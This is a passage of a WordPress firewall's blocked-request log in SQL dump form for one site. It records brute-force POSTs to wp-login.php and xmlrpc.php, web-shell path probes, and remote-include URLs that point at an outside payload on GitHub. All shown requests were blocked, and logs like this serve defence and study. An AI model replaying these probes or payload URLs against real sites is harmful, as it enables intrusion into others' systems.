Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','HGCpUoN5ifsZRX94rq2wI7ML',0,1665579536.2236,11747,'','GET',403,0,700,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ERAunfS4Fth7qePcBNg50DTU',0,1665579089.2439,504,'','POST',403,0,600,0,1,'',0),('185.200.116.211',3116922067,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IfN9qEhKZ6RczUoMl3WkYi4u',0,1665578919.2353,18533,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','89GqaZBUf1HoKIizCkhYTp7S',0,1665575975.5412,14003,'','POST',403,0,515,0,1,'',0),('151.106.35.235',2540315627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hPnW4HcBF8YUDvMLNSz0kOeV',0,1665568649.2295,18591,'','POST',403,0,515,0,1,'',0),('88.135.37.49',1485251889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ENmt1MZoWXspn3a6HSKFvcwd',0,1665568205.3590,2776,'','POST',403,0,515,0,1,'',0),('165.232.180.174',2783491246,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','L9boOwh3iPVHas1TIpUJB8n5',0,1665568151.5333,17641,'','POST',403,0,600,0,1,'',0),('103.90.235.91',1734011739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WSLKNtbDxV7pyMJoQ814ufZw',0,1665567720.3643,11243,'','POST',403,0,515,0,1,'',0),('103.90.235.70',1734011718,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MV9u2cSmbF6p7QTEoixkfgHv',0,1665567268.1640,21149,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1aDMuxdbrs3XlBFwfAN2JYES',0,1665566377.1332,5011,'','POST',403,0,515,0,1,'',0),('79.143.85.14',1334793486,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B0LiKoSfEwXns1TpFJqGZQb6',0,1665565982.3467,18767,'','POST',403,0,515,0,1,'',0),('72.167.34.14',1218912782,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','lLSEAypB2IW5ui4VOkJtQr7D',0,1665566249.8264,17619,'','POST',403,0,600,0,1,'',0),('69.174.52.230',1169044710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','yvFN5Yzp7oSdimW6RDxg3rVA',0,1665565532.5124,16955,'','POST',403,0,515,0,1,'',0),('167.71.63.47',2806464303,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','fU2AMx7Za90l5IPV6DcXeEKj',0,1665565424.6246,18086,'','POST',403,0,600,0,1,'',0),('162.219.250.15',2732325391,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','DkB9KMfmPQRraW8jeJo45lZ7',0,1665572343.8176,2663,'','POST',403,0,515,0,1,'',0),('188.212.34.69',3168019013,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','WHtmqYAD5jGTE9oMUNgyu10l',0,1665572064.9986,13593,'','POST',403,0,600,0,1,'',0),('167.99.54.31',2808296991,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fIoSMlNqp2QeBA6w3h07J1jg',0,1665571425.0093,19347,'','POST',403,0,515,0,1,'',0),('206.189.112.203',3468521675,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Im46kfE5Qj7OrAMG1DVpPSwl',0,1665571874.0144,18225,'','POST',403,0,515,0,1,'',0),('194.233.69.10',3270067466,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YitzJUHlSQhL4jdyc2TBvO0V',0,1665570929.4014,18961,'','POST',403,0,515,0,1,'',0),('148.72.211.177',2487800753,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ZjvAaDYqWSGpbieQhxTI64dw',0,1665570467.0584,19124,'','POST',403,0,515,0,1,'',0),('198.46.81.19',3324924179,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2272.101 Safari\\/537.36\"}','Sr8EOwGUBzPjHC1ImqfRyZV6',0,1665570154.0894,17281,'','POST',403,0,600,0,1,'',0),('185.153.8.103',3113814119,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1uGofKSdHMvgX9P2aRctQBOI',0,1665570015.1666,18822,'','POST',403,0,515,0,1,'',0),('213.152.186.168',3583556264,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','5Ynf4l1Qk3oDAisbSy0rq9eI',0,1665569559.7373,17951,'','POST',403,0,515,0,1,'',0),('159.89.2.220',2673410780,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','thNcjC9vRwlr2zsSZUDXgKx6',0,1665569564.3514,13251,'','POST',403,0,515,0,1,'',0),('95.217.129.44',1608089900,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','c8HUbOmyz1Nrv6sCeQ0uFpYB',0,1665569316.5465,6918,'','POST',403,0,600,0,1,'',0),('134.209.105.240',2261871088,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2zTZOm1ntR5WrGeQNuJaIsFl',0,1665569084.1553,19250,'','POST',403,0,515,0,1,'',0),('75.119.135.205',1266124749,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','QdJCIoZpvMjDx7PNwElkGbyz',0,1665575969.9456,17569,'','POST',403,0,600,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sQr3VDl4E0ZW8LjakOX5epC6',0,1665575544.9816,18904,'','POST',403,0,515,0,1,'',0),('186.234.80.121',3135918201,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','efEGHBDaV2bmAO6coLYCl78x',0,1665575064.7859,19303,'','POST',403,0,515,0,1,'',0),('85.95.146.83',1432326739,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','8WpgvOlDJiy4XUCYx1Zd5Nsh',0,1665574564.0192,11004,'','POST',403,0,515,0,1,'',0),('62.90.101.113',1046111601,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Ve183PGL0mAFfgZ6JSndHURY',0,1665574058.6822,17793,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','3vVCzmXjswqU5bpIeQfS9oyH',0,1665573839.1945,1686,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/51.0.2704.106 Safari\\/537.36\"}','G37U0JwexPy64o9EHIlOWajg',0,1665574057.5927,18070,'','POST',403,0,600,0,1,'',0),('193.37.254.3',3240492547,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BdUkK12asHJDIC7GXSRTwE8M',0,1665573730.8787,19001,'','POST',403,0,515,0,1,'',0),('139.59.20.111',2335904879,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JAYPKGN6hpg9ye0b2CuaVIDi',0,1665573332.1077,3505,'','POST',403,0,515,0,1,'',0),('104.131.68.19',1753433107,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','SrjsE8Px1JaMfHOtKmGzvVlc',0,1665572517.4040,13474,'','POST',403,0,600,0,1,'',0),('103.130.218.189',1736628925,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.116 Safari\\/537.36\"}','DvmnyBt7phY0KGLT5SkfbU4o',0,1665573219.7473,17704,'','POST',403,0,600,0,1,'',0),('120.78.15.126',2018381694,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','fCHZOQBPlTrFeVuGLotg5wEq',0,1665577975.1199,19011,'','POST',403,0,600,0,1,'',0),('157.245.246.208',2650142416,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','igqF2srTda6eGWS91JXcUKRl',0,1665577770.6593,19646,'','POST',403,0,515,0,1,'',0),('137.184.140.67',2310573123,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9ImFwOBxhEaVAYy0qU2TtRPl',0,1665577284.5605,19014,'','POST',403,0,515,0,1,'',0),('148.72.214.194',2487801538,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','6u3lhrzj0FfBgLPdKGTbankY',0,1665577136.7360,10600,'','POST',403,0,600,0,1,'',0),('103.116.16.173',1735659693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lGsaWM3q8BtL6FSDiuohdbxE',0,1665577053.1653,18686,'','POST',403,0,515,0,1,'',0),('178.124.210.118',2994524790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','X8EMuadw9BmSRYrT6GJijlOx',0,1665576040.6805,16083,'','POST',403,0,515,0,1,'',0),('185.2.4.56',3103917112,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/48.0.2564.109 Safari\\/537.36\"}','9rdzLAt3Rj2uGFnBCM8VI6Qb',0,1665581914.0449,506,'','POST',403,0,600,0,1,'',0),('80.87.194.140',1347928716,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uLAt4ksOcGQ6nbah8r7DTpf3',0,1665581372.5388,647,'','POST',403,0,600,0,1,'',0),('96.47.229.59',1613751611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','pJF2QHErXzx3tnPiNshWRq9l',0,1665580428.4081,2294,'','POST',403,0,515,0,1,'',0),('51.89.47.206',861482958,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/59.0.3071.115 Safari\\/537.36\"}','FA36ymLQoa2Npcv7PXKHnG9e',0,1665581072.7824,1640,'','POST',403,0,600,0,1,'',0),('96.47.229.59',1613751611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kMr4LcxN2WGVPtQyo1q9YKOd',0,1665580427.3181,2900,'','POST',403,0,515,0,1,'',0),('188.166.236.35',3165056035,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','niBcQaKHZPC6LbkAIGSX7esq',0,1665580357.2775,15719,'','POST',403,0,600,0,1,'',0),('72.167.51.34',1218917154,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','xsjaFSOVmZ34Nk6EX8CvGrQJ',0,1665580010.5094,688,'','POST',403,0,600,0,1,'',0),('171.244.0.91',2884894811,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/52.0.2743.116 Safari\\/537.36\"}','1FlmABhVnUT4ZspG9vqXyRMP',0,1665579896.1156,17959,'','POST',403,0,600,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','mesGjpqhISBoW1rwYDN4ydcb',0,1665584297.5732,17276,'','POST',403,0,600,0,1,'',0),('133.130.103.36',2239915812,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','ZJ8kwRta5CjroMDQKeH0zEU3',0,1665584121.8977,17408,'','POST',403,0,600,0,1,'',0),('213.152.161.165',3583549861,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mjhsfMy025zctGuaIgn4DA9J',0,1665583234.8623,18649,'','POST',403,0,515,0,1,'',0),('185.46.121.66',3106830658,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YpS07H9OkBR1MsVDU4Fhteo8',0,1665583545.3842,487,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','z45whvYEFcPyp81uTdDr2b0i',0,1665594564.1178,345,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tsZiC2lXYbV3H5uOTLJd8ekS',0,1665594562.7218,275,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','XuogHCs9yplzGPWi4vE6A0t3',0,1665594556.5024,287,'','GET',403,0,700,0,1,'',0),('217.151.98.168',3650577064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lvQVB6mZz9AbfewoD14CIkS5',0,1665590552.1040,2183,'','POST',403,0,515,0,1,'',0),('217.151.98.168',3650577064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','V5IYHUnuzsAt4G9yW7MNavod',0,1665590351.0514,18913,'','POST',403,0,515,0,1,'',0),('85.146.18.88',1435636312,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','RcmzGpL6gTy8Kfq9b3rBx75k',0,1665589580.6201,1827,'','POST',403,0,600,0,1,'',0),('167.71.117.225',2806478305,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','0oRPIeYcnfEUz7apxBWb8CAT',0,1665586932.1981,920,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','JsipDPbBL6hN2mtAZoS1MWy3',0,1665594555.3580,289,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','xQJYw2DkzC6PBcSspO9bhX5g',0,1665594553.8825,279,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','y45KEVOpBIt8bAN7jaeCzuG3',0,1665594552.5057,313,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','vobkOqz50Y8ZltGMWrSPg2Ld',0,1665594550.8640,283,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LgtWBV9wMXDvPElRcU5eH67i',0,1665594549.6564,374,'','GET',403,0,700,0,1,'',0),('175.178.125.173',2947710381,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','5QKsDdSoABYECXZ1IuxcPqFp',0,1665593505.8781,17687,'','POST',403,0,600,0,1,'',0),('209.141.44.126',3515690110,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','um7Wt8dTMCfNHkyiOaEJGSDe',0,1665592328.6464,527,'','POST',403,0,600,0,1,'',0),('124.153.66.86',2090418774,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','b4l7OBSkXJ8AvIWqdHcMpV26',0,1665592207.8432,10067,'','POST',403,0,600,0,1,'',0),('205.185.116.162',3451483298,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.76.4 (KHTML, like Gecko) Version\\/7.0.4 Safari\\/537.76.4\"}','Gy5PqJ8zHhLZS6RpDUbwtkel',0,1665591822.4071,18501,'','POST',403,0,600,0,1,'',0),('37.120.210.211',628675283,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RNyM5UKBZtwgD6pSEjXP7q89',0,1665591042.8400,19702,'','POST',403,0,515,0,1,'',0),('159.69.8.8',2672101384,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','SL3W6GkIi2nsqTOfd7VozKbQ',0,1665590903.2519,681,'','POST',403,0,600,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','mlIj0oDgOa4eQud2UnB91yNh',0,1665594545.7584,289,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','cZ9qKeOTWuXSYnagVpvyJ5UD',0,1665594542.5034,410,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','7y1C8t59zZdFIDvQoAUPmBRY',0,1665594540.0229,407,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Bd5fj1SKlD2uEqMrFJcTb7vx',0,1665594538.7042,339,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','Afe9bwXmx0YRMPEK41UhvVuk',0,1665594530.7179,413,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','LyjKTFPAwzxgrJ3q8tN2e5sb',0,1665594523.4583,334,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','2YgPVqhUOTGKR4A7yex09Fdc',0,1665594519.5713,485,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','OLf0zoipBh6s25TtHkEMQm3D',0,1665594510.1146,677,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','tAnyjlTNDI49SqszJCgoMV0d',0,1665594455.2197,308,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','FdWP1CJl9oSRGOvVmab4iXNt',0,1665594444.5043,318,'','GET',403,0,700,0,1,'',0),('85.31.46.140',1428106892,'','http://cteisys.com/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 